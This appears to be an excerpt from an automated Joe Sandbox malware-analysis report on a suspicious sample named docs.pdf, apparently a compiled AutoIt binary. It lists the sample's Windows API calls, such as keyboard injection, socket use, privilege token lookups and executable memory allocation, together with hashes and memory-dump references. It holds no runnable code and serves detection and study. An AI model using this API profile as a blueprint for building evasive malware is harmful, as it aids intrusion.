                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 1d28daf1968e4b761a1b7f65c750394ff8556290007523a5672f204d0fb0b9f6
                                                            • Instruction ID: db8b117e4ab9d97ed849b8df6222c94b0ecdbbd0a6450c360c6895d3a4674cde
                                                            • Opcode Fuzzy Hash: 1d28daf1968e4b761a1b7f65c750394ff8556290007523a5672f204d0fb0b9f6
                                                            • Instruction Fuzzy Hash: 8231923120420AABDB118F34CC45BEB77B9EB49324F248729F979932E1D731E9919B50
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001776D0
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001776E4
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00177708
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: 710b24c394995fac7c57bda0a0da404f81eb606b1117c36200be7fab1e413777
                                                            • Instruction ID: d7db07996f81a754b509b081297111e6a028d7a63bbb65085a31404e36184ef6
                                                            • Opcode Fuzzy Hash: 710b24c394995fac7c57bda0a0da404f81eb606b1117c36200be7fab1e413777
                                                            • Instruction Fuzzy Hash: 3A21D132504218BBDF15CFA4CC86FEA3B79EF48714F114254FE196B1D0DBB1A8918BA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00176FAA
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00176FBA
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00176FDF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: 588100512cb2acbeb3eac64b8381d365f230f5ab1a39f1c881fc613a80cc2c65
                                                            • Instruction ID: ce2a7e556ff9aecaa30774a8f95a336dc31bc1c4930f33453cd5426ea3959df2
                                                            • Opcode Fuzzy Hash: 588100512cb2acbeb3eac64b8381d365f230f5ab1a39f1c881fc613a80cc2c65
                                                            • Instruction Fuzzy Hash: 16219232610118BFDF159F54DC95FBB3BBAEF89754F118124FA189B190CB71AC518BA0
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001779E1
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001779F6
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00177A03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: a143c0e03fc8d7594d0897d4e48fa195647fb01f08f15ebdacdae9b2eda4c18a
                                                            • Instruction ID: cc4a714a08c792e4acac125ef03dddbc995852bdbc599f05746b9daf1bbfbb04
                                                            • Opcode Fuzzy Hash: a143c0e03fc8d7594d0897d4e48fa195647fb01f08f15ebdacdae9b2eda4c18a
                                                            • Instruction Fuzzy Hash: 5D112372244208BAEF109F60CC05FEB3BB9EF89B64F024528FB04A20D0D3719851CB20
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000F4C2E), ref: 000F4CA3
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000F4CB5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000F4D2E,?,000F4F4F,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4D6F
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 000F4D81
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,000F4CE1,?), ref: 000F4DA2
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000F4DB4
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,001712C1), ref: 00171080
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00171092
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00169009,?,0017F910), ref: 00169403
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00169415
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            APIs
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 0016E3D2
                                                            • CharLowerBuffW.USER32(?,?), ref: 0016E415
                                                              • Part of subcall function 0016DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0016DAD9
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0016E615
                                                            • _memmove.LIBCMT ref: 0016E628
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 001683D8
                                                            • CoUninitialize.OLE32 ref: 001683E3
                                                              • Part of subcall function 0014DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0014DAC5
                                                            • VariantInit.OLEAUT32(?), ref: 001683EE
                                                            • VariantClear.OLEAUT32(?), ref: 001686BF
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00182C7C,?), ref: 00147C32
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00182C7C,?), ref: 00147C4A
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,0017FB80,000000FF,?,00000000,00000800,00000000,?,00182C7C,?), ref: 00147C6F
                                                            • _memcmp.LIBCMT ref: 00147C90
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID:
                                                            • API String ID: 314563124-0
                                                            APIs
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            APIs
                                                            • GetWindowRect.USER32(00E9E638,?), ref: 00179AD2
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 00179B05
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00179B72
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00166CE4
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166CF4
                                                              • Part of subcall function 000F9997: __itow.LIBCMT ref: 000F99C2
                                                              • Part of subcall function 000F9997: __swprintf.LIBCMT ref: 000F9A0C
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00166D58
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00166D64
                                                            Similarity
                                                            • API ID: ErrorLast$__itow__swprintfsocket
                                                            • String ID:
                                                            • API String ID: 2214342067-0
                                                            • Opcode ID: c3b9fc7f886cd560d12ec7f82c9613f8fbede84f74dd486673c12679984c59e5
                                                            • Instruction ID: 67d2c61e8a0a73ee441e20b631722e9ed33f85b0bf1403104db63131f7c527a7
                                                            • Opcode Fuzzy Hash: c3b9fc7f886cd560d12ec7f82c9613f8fbede84f74dd486673c12679984c59e5
                                                            • Instruction Fuzzy Hash: 8A41BF74740204AFEB24AF24DC86FBA77E9AB04B10F44801CFB599B6D3DB759C419B91
                                                            APIs
                                                            • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0017F910), ref: 001667BA
                                                            • _strlen.LIBCMT ref: 001667EC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID:
                                                            • API String ID: 4218353326-0
                                                            • Opcode ID: 979ea2f2f8d9ca42ea0e08985460e93cee502234ec2473a5d23c2059b17e2676
                                                            • Instruction ID: dde8b652cf1c4853017094236915586dbee47b87ff21ae0da87268ffd6f40768
                                                            • Opcode Fuzzy Hash: 979ea2f2f8d9ca42ea0e08985460e93cee502234ec2473a5d23c2059b17e2676
                                                            • Instruction Fuzzy Hash: 8341D531A00208ABCB14EB74DCC1FFEB7ADAF18314F148169FA1997292DB30AD51C791
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0015BB09
                                                            • GetLastError.KERNEL32(?,00000000), ref: 0015BB2F
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0015BB54
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0015BB80
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: 5e96ac03c0bc2c84c8888f28a7c1bb1479bc0732fbf59b94a4213c8ff5f301f7
                                                            • Instruction ID: 94e2e24035baace06c6edb927fac123a5fac7280e0f94481ecda457d75fe3274
                                                            • Opcode Fuzzy Hash: 5e96ac03c0bc2c84c8888f28a7c1bb1479bc0732fbf59b94a4213c8ff5f301f7
                                                            • Instruction Fuzzy Hash: E9413539204614DFCB10EF18C584AA9BBF1EF89310B098488ED5A9FB62CB70FD45DB91
                                                            APIs
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00178B4D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: InvalidateRect
                                                            • String ID:
                                                            • API String ID: 634782764-0
                                                            • Opcode ID: 99e20eca8132f5c8765def2b249cf302c7c1cb5c75a48d6e1b7dd2b612aa9eb2
                                                            • Instruction ID: 89ae46da0f33c162953ff614082724d2493a78c51640f7583fc255f360e401e4
                                                            • Opcode Fuzzy Hash: 99e20eca8132f5c8765def2b249cf302c7c1cb5c75a48d6e1b7dd2b612aa9eb2
                                                            • Instruction Fuzzy Hash: 353194B4680204BEEB249E28CC9DFA93775EB09310F64C616FA59D76E1CF31A9809751
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 0017AE1A
                                                            • GetWindowRect.USER32(?,?), ref: 0017AE90
                                                            • PtInRect.USER32(?,?,0017C304), ref: 0017AEA0
                                                            • MessageBeep.USER32(00000000), ref: 0017AF11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: 9c757994a2bebf91e51ffbb26e8273796213fb4cba0132e668213c7ae5491b2f
                                                            • Instruction ID: 957ed385616e8f4ea219aceec00fb01e624952643e283100d4b260ea56145cd6
                                                            • Opcode Fuzzy Hash: 9c757994a2bebf91e51ffbb26e8273796213fb4cba0132e668213c7ae5491b2f
                                                            • Instruction Fuzzy Hash: 4A416D71600219DFCB11CF58C884AAD7BF5FF99350F54C1A9E41D9B251DB30A982DB92
                                                            APIs
                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00151037
                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00151053
                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001510B9
                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0015110B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 84078023c9e8e79bc02042354f275e4e8e34662ebfca637fa9bf5145ca40e612
                                                            • Instruction ID: 6eeccaa292ef7385c72fff5a6e3c7f9970667d49292bd1ef14305e54f859826e
                                                            • Opcode Fuzzy Hash: 84078023c9e8e79bc02042354f275e4e8e34662ebfca637fa9bf5145ca40e612
                                                            • Instruction Fuzzy Hash: 73313930E40698FEFB368A65CC05BFEBBA9AB48312F04431AFDA45A1D1C37489C99751
                                                            APIs
                                                            • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00151176
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00151192
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 001511F1
                                                            • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00151243
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 4d135b1c9aeea583bd8cbab2e2d6e06e4b526a15296ea48d1824c8f91d0f5952
                                                            • Instruction ID: 514d40b6a1b80c7a8445de91e2e85d80ce872cb1667b72d4de30a958d0d0fded
                                                            • Opcode Fuzzy Hash: 4d135b1c9aeea583bd8cbab2e2d6e06e4b526a15296ea48d1824c8f91d0f5952
                                                            • Instruction Fuzzy Hash: CD316B30940A08FEEF268A75CC047FA7BBAAB59312F14439EF9B19A1D1C3744D8D8751
                                                            APIs
                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0012644B
                                                            • __isleadbyte_l.LIBCMT ref: 00126479
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001264A7
                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 001264DD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                            • String ID:
                                                            • API String ID: 3058430110-0
                                                            • Opcode ID: 8a6d7c7c8a734da27de827a20b955b7786e1705f3521a6a5c484047d961e2067
                                                            • Instruction ID: dab22eb3b265c056d8bf72abdc4b89c9e02bb18d5f185614b5fae214e78a427a
                                                            • Opcode Fuzzy Hash: 8a6d7c7c8a734da27de827a20b955b7786e1705f3521a6a5c484047d961e2067
                                                            • Instruction Fuzzy Hash: F631C1316042A6EFDB25AF65EC45BBA7BB5FF40320F154029F8A4871D1E731D8A1DB90
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00175189
                                                              • Part of subcall function 0015387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00153897
                                                              • Part of subcall function 0015387D: GetCurrentThreadId.KERNEL32 ref: 0015389E
                                                              • Part of subcall function 0015387D: AttachThreadInput.USER32(00000000,?,001552A7), ref: 001538A5
                                                            • GetCaretPos.USER32(?), ref: 0017519A
                                                            • ClientToScreen.USER32(00000000,?), ref: 001751D5
                                                            • GetForegroundWindow.USER32 ref: 001751DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: b3105f2028e4792597a51737db2249f6174bb1d1ae01632f1193364141491495
                                                            • Instruction ID: b7d683045d7341b6040e492a76c6951424b3efb5df7f65ba47aa77cbb70eb357
                                                            • Opcode Fuzzy Hash: b3105f2028e4792597a51737db2249f6174bb1d1ae01632f1193364141491495
                                                            • Instruction Fuzzy Hash: 58310D71900108AFDB04EFA5CC85AEFB7F9EF98304F10406AE515E7252EA759E45CBA1
                                                            APIs
                                                              • Part of subcall function 000F2612: GetWindowLongW.USER32(?,000000EB), ref: 000F2623
                                                            • GetCursorPos.USER32(?), ref: 0017C7C2
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0012BBFB,?,?,?,?,?), ref: 0017C7D7
                                                            • GetCursorPos.USER32(?), ref: 0017C824
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0012BBFB,?,?,?), ref: 0017C85E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: 2551b2ffecbeaa9992a0dff40f51d9dff9a2a8d814454fb0d8e4299d3592aca3
                                                            • Instruction ID: 62c258072cfe5d15cd4956b1d0e7e4d015a701e9c3bf2d7ee6e18994e0275dfa
                                                            • Opcode Fuzzy Hash: 2551b2ffecbeaa9992a0dff40f51d9dff9a2a8d814454fb0d8e4299d3592aca3
                                                            • Instruction Fuzzy Hash: 30319F35600118AFCB15CF58C898EEABBBAEB49710F04816DF9098B661C7359E91DFA1
                                                            APIs
                                                               • Part of subcall function 00148652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00148669
                                                               • Part of subcall function 00148652: GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00148673
                                                               • Part of subcall function 00148652: GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00148682
                                                               • Part of subcall function 00148652: HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 00148689
                                                               • Part of subcall function 00148652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 0014869F
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00148BEB
                                                            • _memcmp.LIBCMT ref: 00148C0E
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00148C44
                                                            • HeapFree.KERNEL32(00000000), ref: 00148C4B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                             • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
